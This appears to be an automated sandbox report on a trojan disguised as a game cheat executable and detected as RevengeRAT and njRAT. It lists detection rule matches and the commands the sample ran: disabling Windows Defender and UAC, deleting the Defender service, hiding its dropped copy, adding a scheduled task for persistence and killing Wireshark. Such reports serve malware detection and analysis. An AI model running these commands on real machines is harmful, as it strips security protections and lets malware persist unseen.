Source: qmgr.db.28.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.28.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.28.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: edb.log.28.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
Source: svchost.exe, 0000001C.00000003.1710431158.000001AAA9A00000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.28.dr, edb.log.28.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2/C:
Source: dllhost.exe, 00000025.00000002.1982630198.0000000002511000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000026.00000002.2076276822.0000000002552000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000026.00000002.2076276822.000000000254F000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000027.00000002.2185454516.000000000265F000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000027.00000002.2185454516.0000000002662000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000029.00000002.2777347353.0000000002702000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 00000029.00000002.2777347353.00000000026FF000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 0000002A.00000002.3335794048.00000000027BF000.00000004.00000800.00020000.00000000.sdmp, dllhost.exe, 0000002A.00000002.3335794048.00000000027C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/???

E-Banking Fraud

Yara detected Njrat

Source: Yara match	File source: 00000025.00000002.1982630198.0000000002511000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1507638179.00000000027D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SpeedHack666Cheat (no VM detected).exe PID: 6780, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dllhost.exe PID: 4940, type: MEMORYSTR

Yara detected RevengeRAT

Source: Yara match

File source: Process Memory Space: SpeedHack666Cheat (no VM detected).exe PID: 6780, type: MEMORYSTR

Operating System Destruction

Protects its processes via BreakOnTermination flag

Source: C:\ProgramData\dllhost.exe

Process information set: 01 00 00 00

Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: SpeedHack666Cheat (no VM detected).exe, type: SAMPLE	Matched rule: Detects RevengeRAT malware Author: Florian Roth
Source: 0.2.SpeedHack666Cheat (no VM detected).exe.37d4268.1.unpack, type: UNPACKEDPE	Matched rule: Detects RevengeRAT malware Author: Florian Roth
Source: 0.2.SpeedHack666Cheat (no VM detected).exe.386da98.0.unpack, type: UNPACKEDPE	Matched rule: Detects RevengeRAT malware Author: Florian Roth
Source: 0.2.SpeedHack666Cheat (no VM detected).exe.37d4268.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RevengeRAT malware Author: Florian Roth
Source: 0.0.SpeedHack666Cheat (no VM detected).exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RevengeRAT malware Author: Florian Roth
Source: 00000025.00000002.1982630198.0000000002511000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 00000025.00000002.1982630198.0000000002511000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000025.00000002.1982630198.0000000002511000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.1507638179.00000000027D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 00000000.00000002.1507638179.00000000027D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000000.00000002.1507638179.00000000027D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: C:\ProgramData\dllhost.exe, type: DROPPED	Matched rule: Detects RevengeRAT malware Author: Florian Roth
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\87078a174f1e0ed9d58afdf2d6d178c3.exe, type: DROPPED	Matched rule: Detects RevengeRAT malware Author: Florian Roth
Source: C:\ClickMe.exe, type: DROPPED	Matched rule: Detects RevengeRAT malware Author: Florian Roth

Source: C:\ProgramData\dllhost.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe	Code function: 0_2_0097B266 NtQuerySystemInformation,	0_2_0097B266
Source: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe	Code function: 0_2_0097B235 NtQuerySystemInformation,	0_2_0097B235
Source: C:\ProgramData\dllhost.exe	Code function: 2_2_0083B4E2 NtQuerySystemInformation,	2_2_0083B4E2
Source: C:\ProgramData\dllhost.exe	Code function: 2_2_0083B4B1 NtQuerySystemInformation,	2_2_0083B4B1
Source: C:\ProgramData\dllhost.exe	Code function: 2_2_068606CE NtSetInformationProcess,	2_2_068606CE
Source: C:\ProgramData\dllhost.exe	Code function: 2_2_068606AC NtSetInformationProcess,	2_2_068606AC
Source: C:\ProgramData\dllhost.exe	Code function: 26_2_0063B4E2 NtQuerySystemInformation,	26_2_0063B4E2
Source: C:\ProgramData\dllhost.exe	Code function: 26_2_0063B4B1 NtQuerySystemInformation,	26_2_0063B4B1
Source: C:\ProgramData\dllhost.exe	Code function: 37_2_0073B4E2 NtQuerySystemInformation,	37_2_0073B4E2
Source: C:\ProgramData\dllhost.exe	Code function: 37_2_0073B4B1 NtQuerySystemInformation,	37_2_0073B4B1
Source: C:\ProgramData\dllhost.exe	Code function: 38_2_0083B4E2 NtQuerySystemInformation,	38_2_0083B4E2
Source: C:\ProgramData\dllhost.exe	Code function: 38_2_0083B4B1 NtQuerySystemInformation,	38_2_0083B4B1
Source: C:\ProgramData\dllhost.exe	Code function: 39_2_0082B4E2 NtQuerySystemInformation,	39_2_0082B4E2
Source: C:\ProgramData\dllhost.exe	Code function: 39_2_0082B4B1 NtQuerySystemInformation,	39_2_0082B4B1
Source: C:\ProgramData\dllhost.exe	Code function: 41_2_0086B4E2 NtQuerySystemInformation,	41_2_0086B4E2
Source: C:\ProgramData\dllhost.exe	Code function: 41_2_0086B4B1 NtQuerySystemInformation,	41_2_0086B4B1
Source: C:\ProgramData\dllhost.exe	Code function: 42_2_0082B4E2 NtQuerySystemInformation,	42_2_0082B4E2
Source: C:\ProgramData\dllhost.exe	Code function: 42_2_0082B4B1 NtQuerySystemInformation,	42_2_0082B4B1

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Source: C:\ProgramData\dllhost.exe

Code function: 2_2_04BC3C90

2_2_04BC3C90

Source: SpeedHack666Cheat (no VM detected).exe, 00000000.00000002.1486555401.00000000005CE000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: OriginalFilenamemscorwks.dllT vs SpeedHack666Cheat (no VM detected).exe

Source: SpeedHack666Cheat (no VM detected).exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\reg.exe reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

Source: SpeedHack666Cheat (no VM detected).exe, type: SAMPLE	Matched rule: RevengeRAT_Sep17 date = 2017-09-04, hash3 = fe00c4f9c8439eea50b44f817f760d8107f81e2dba7f383009fde508ff4b8967, hash2 = 7c271484c11795876972aabeb277c7b3035f896c9e860a852d69737df6e14213, hash1 = 2a86a4b2dcf1657bcb2922e70fc787aa9b66ec1c26dc2119f669bd2ce3f2e94a, author = Florian Roth, description = Detects RevengeRAT malware, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.SpeedHack666Cheat (no VM detected).exe.37d4268.1.unpack, type: UNPACKEDPE	Matched rule: RevengeRAT_Sep17 date = 2017-09-04, hash3 = fe00c4f9c8439eea50b44f817f760d8107f81e2dba7f383009fde508ff4b8967, hash2 = 7c271484c11795876972aabeb277c7b3035f896c9e860a852d69737df6e14213, hash1 = 2a86a4b2dcf1657bcb2922e70fc787aa9b66ec1c26dc2119f669bd2ce3f2e94a, author = Florian Roth, description = Detects RevengeRAT malware, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.SpeedHack666Cheat (no VM detected).exe.386da98.0.unpack, type: UNPACKEDPE	Matched rule: RevengeRAT_Sep17 date = 2017-09-04, hash3 = fe00c4f9c8439eea50b44f817f760d8107f81e2dba7f383009fde508ff4b8967, hash2 = 7c271484c11795876972aabeb277c7b3035f896c9e860a852d69737df6e14213, hash1 = 2a86a4b2dcf1657bcb2922e70fc787aa9b66ec1c26dc2119f669bd2ce3f2e94a, author = Florian Roth, description = Detects RevengeRAT malware, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.SpeedHack666Cheat (no VM detected).exe.37d4268.1.raw.unpack, type: UNPACKEDPE	Matched rule: RevengeRAT_Sep17 date = 2017-09-04, hash3 = fe00c4f9c8439eea50b44f817f760d8107f81e2dba7f383009fde508ff4b8967, hash2 = 7c271484c11795876972aabeb277c7b3035f896c9e860a852d69737df6e14213, hash1 = 2a86a4b2dcf1657bcb2922e70fc787aa9b66ec1c26dc2119f669bd2ce3f2e94a, author = Florian Roth, description = Detects RevengeRAT malware, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.0.SpeedHack666Cheat (no VM detected).exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: RevengeRAT_Sep17 date = 2017-09-04, hash3 = fe00c4f9c8439eea50b44f817f760d8107f81e2dba7f383009fde508ff4b8967, hash2 = 7c271484c11795876972aabeb277c7b3035f896c9e860a852d69737df6e14213, hash1 = 2a86a4b2dcf1657bcb2922e70fc787aa9b66ec1c26dc2119f669bd2ce3f2e94a, author = Florian Roth, description = Detects RevengeRAT malware, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000025.00000002.1982630198.0000000002511000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 00000025.00000002.1982630198.0000000002511000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000025.00000002.1982630198.0000000002511000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 00000000.00000002.1507638179.00000000027D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 00000000.00000002.1507638179.00000000027D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000000.00000002.1507638179.00000000027D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: C:\ProgramData\dllhost.exe, type: DROPPED	Matched rule: RevengeRAT_Sep17 date = 2017-09-04, hash3 = fe00c4f9c8439eea50b44f817f760d8107f81e2dba7f383009fde508ff4b8967, hash2 = 7c271484c11795876972aabeb277c7b3035f896c9e860a852d69737df6e14213, hash1 = 2a86a4b2dcf1657bcb2922e70fc787aa9b66ec1c26dc2119f669bd2ce3f2e94a, author = Florian Roth, description = Detects RevengeRAT malware, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\87078a174f1e0ed9d58afdf2d6d178c3.exe, type: DROPPED	Matched rule: RevengeRAT_Sep17 date = 2017-09-04, hash3 = fe00c4f9c8439eea50b44f817f760d8107f81e2dba7f383009fde508ff4b8967, hash2 = 7c271484c11795876972aabeb277c7b3035f896c9e860a852d69737df6e14213, hash1 = 2a86a4b2dcf1657bcb2922e70fc787aa9b66ec1c26dc2119f669bd2ce3f2e94a, author = Florian Roth, description = Detects RevengeRAT malware, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\ClickMe.exe, type: DROPPED	Matched rule: RevengeRAT_Sep17 date = 2017-09-04, hash3 = fe00c4f9c8439eea50b44f817f760d8107f81e2dba7f383009fde508ff4b8967, hash2 = 7c271484c11795876972aabeb277c7b3035f896c9e860a852d69737df6e14213, hash1 = 2a86a4b2dcf1657bcb2922e70fc787aa9b66ec1c26dc2119f669bd2ce3f2e94a, author = Florian Roth, description = Detects RevengeRAT malware, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/

Source: SpeedHack666Cheat (no VM detected).exe, JPIGAIGLMLGAPAPCOMNMCOFGCCHOODAODJNE.cs	Cryptographic APIs: 'CreateDecryptor'
Source: SpeedHack666Cheat (no VM detected).exe, FOBGOMGCLCDKKFGLBHOEPDKOBBHNJGLJBHOM.cs	Cryptographic APIs: 'CreateDecryptor'
Source: SpeedHack666Cheat (no VM detected).exe, FOBGOMGCLCDKKFGLBHOEPDKOBBHNJGLJBHOM.cs	Cryptographic APIs: 'CreateDecryptor'
Source: SpeedHack666Cheat (no VM detected).exe, FOBGOMGCLCDKKFGLBHOEPDKOBBHNJGLJBHOM.cs	Cryptographic APIs: 'CreateDecryptor'
Source: SpeedHack666Cheat (no VM detected).exe, FOBGOMGCLCDKKFGLBHOEPDKOBBHNJGLJBHOM.cs	Cryptographic APIs: 'CreateDecryptor'
Source: ClickMe.exe.0.dr, JPIGAIGLMLGAPAPCOMNMCOFGCCHOODAODJNE.cs	Cryptographic APIs: 'CreateDecryptor'
Source: ClickMe.exe.0.dr, FOBGOMGCLCDKKFGLBHOEPDKOBBHNJGLJBHOM.cs	Cryptographic APIs: 'CreateDecryptor'
Source: ClickMe.exe.0.dr, FOBGOMGCLCDKKFGLBHOEPDKOBBHNJGLJBHOM.cs	Cryptographic APIs: 'CreateDecryptor'
Source: ClickMe.exe.0.dr, FOBGOMGCLCDKKFGLBHOEPDKOBBHNJGLJBHOM.cs	Cryptographic APIs: 'CreateDecryptor'
Source: ClickMe.exe.0.dr, FOBGOMGCLCDKKFGLBHOEPDKOBBHNJGLJBHOM.cs	Cryptographic APIs: 'CreateDecryptor'
Source: dllhost.exe.0.dr, JPIGAIGLMLGAPAPCOMNMCOFGCCHOODAODJNE.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.phis.troj.adwa.evad.winEXE@52/16@1/2

Source: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe	Code function: 0_2_0097B0EA AdjustTokenPrivileges,	0_2_0097B0EA
Source: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe	Code function: 0_2_0097B0B3 AdjustTokenPrivileges,	0_2_0097B0B3
Source: C:\ProgramData\dllhost.exe	Code function: 2_2_0083B366 AdjustTokenPrivileges,	2_2_0083B366
Source: C:\ProgramData\dllhost.exe	Code function: 2_2_0083B32F AdjustTokenPrivileges,	2_2_0083B32F
Source: C:\ProgramData\dllhost.exe	Code function: 26_2_0063B366 AdjustTokenPrivileges,	26_2_0063B366
Source: C:\ProgramData\dllhost.exe	Code function: 26_2_0063B32F AdjustTokenPrivileges,	26_2_0063B32F
Source: C:\ProgramData\dllhost.exe	Code function: 37_2_0073B366 AdjustTokenPrivileges,	37_2_0073B366
Source: C:\ProgramData\dllhost.exe	Code function: 37_2_0073B32F AdjustTokenPrivileges,	37_2_0073B32F
Source: C:\ProgramData\dllhost.exe	Code function: 38_2_0083B366 AdjustTokenPrivileges,	38_2_0083B366
Source: C:\ProgramData\dllhost.exe	Code function: 38_2_0083B32F AdjustTokenPrivileges,	38_2_0083B32F
Source: C:\ProgramData\dllhost.exe	Code function: 39_2_0082B366 AdjustTokenPrivileges,	39_2_0082B366
Source: C:\ProgramData\dllhost.exe	Code function: 39_2_0082B32F AdjustTokenPrivileges,	39_2_0082B32F
Source: C:\ProgramData\dllhost.exe	Code function: 41_2_0086B366 AdjustTokenPrivileges,	41_2_0086B366
Source: C:\ProgramData\dllhost.exe	Code function: 41_2_0086B32F AdjustTokenPrivileges,	41_2_0086B32F
Source: C:\ProgramData\dllhost.exe	Code function: 42_2_0082B366 AdjustTokenPrivileges,	42_2_0082B366
Source: C:\ProgramData\dllhost.exe	Code function: 42_2_0082B32F AdjustTokenPrivileges,	42_2_0082B32F

Source: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\SpeedHack666Cheat (no VM detected).exe.log

Jump to behavior

Source: C:\ProgramData\dllhost.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6364:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4040:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:768:120:WilError_03
Source: C:\ProgramData\dllhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\87078a174f1e0ed9d58afdf2d6d178c3
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6348:120:WilError_03
Source: C:\ProgramData\dllhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7096:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2884:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4788:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3324:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1012:120:WilError_03

Source: C:\ProgramData\dllhost.exe

File created: C:\Users\user\AppData\Local\Temp\obito.txt

Jump to behavior

Source: SpeedHack666Cheat (no VM detected).exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: SpeedHack666Cheat (no VM detected).exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.69%

Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "Wireshark.exe")
Source: C:\ProgramData\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "Wireshark.exe")

Source: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe

File read: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe "C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe"
Source: unknown	Process created: C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
Source: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe	Process created: C:\ProgramData\dllhost.exe "C:\ProgramData\dllhost.exe"
Source: C:\ProgramData\dllhost.exe	Process created: C:\Windows\SysWOW64\attrib.exe attrib +h "C:\ProgramData\dllhost.exe"
Source: C:\Windows\SysWOW64\attrib.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\dllhost.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableRealtimeMonitoring $true
Source: C:\ProgramData\dllhost.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c sc query windefend
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\sc.exe sc query windefend
Source: C:\ProgramData\dllhost.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c sc stop windefend
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\sc.exe sc stop windefend
Source: C:\ProgramData\dllhost.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c sc delete windefend
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\sc.exe sc delete windefend
Source: C:\ProgramData\dllhost.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /delete /tn CleanSweepCheck /f
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\dllhost.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn CleanSweepCheck /tr C:\ProgramData\dllhost.exe
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\dllhost.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
Source: unknown	Process created: C:\ProgramData\dllhost.exe C:\ProgramData\dllhost.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\ProgramData\dllhost.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im Wireshark.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im Wireshark.exe
Source: unknown	Process created: C:\ProgramData\dllhost.exe "C:\ProgramData\dllhost.exe" ..
Source: unknown	Process created: C:\ProgramData\dllhost.exe "C:\ProgramData\dllhost.exe" ..
Source: unknown	Process created: C:\ProgramData\dllhost.exe "C:\ProgramData\dllhost.exe" ..
Source: unknown	Process created: C:\ProgramData\dllhost.exe C:\ProgramData\dllhost.exe
Source: unknown	Process created: C:\ProgramData\dllhost.exe C:\ProgramData\dllhost.exe
Source: unknown	Process created: C:\ProgramData\dllhost.exe C:\ProgramData\dllhost.exe
Source: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe	Process created: C:\ProgramData\dllhost.exe "C:\ProgramData\dllhost.exe"	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Process created: C:\Windows\SysWOW64\attrib.exe attrib +h "C:\ProgramData\dllhost.exe"	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring $true	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c sc query windefend	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c sc stop windefend	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c sc delete windefend	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /delete /tn CleanSweepCheck /f	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn CleanSweepCheck /tr C:\ProgramData\dllhost.exe	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\ProgramData\dllhost.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableRealtimeMonitoring $true	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\sc.exe sc query windefend	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\sc.exe sc stop windefend	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\sc.exe sc delete windefend
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im Wireshark.exe

Source: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe	Section loaded: profapi.dll	Jump to behavior
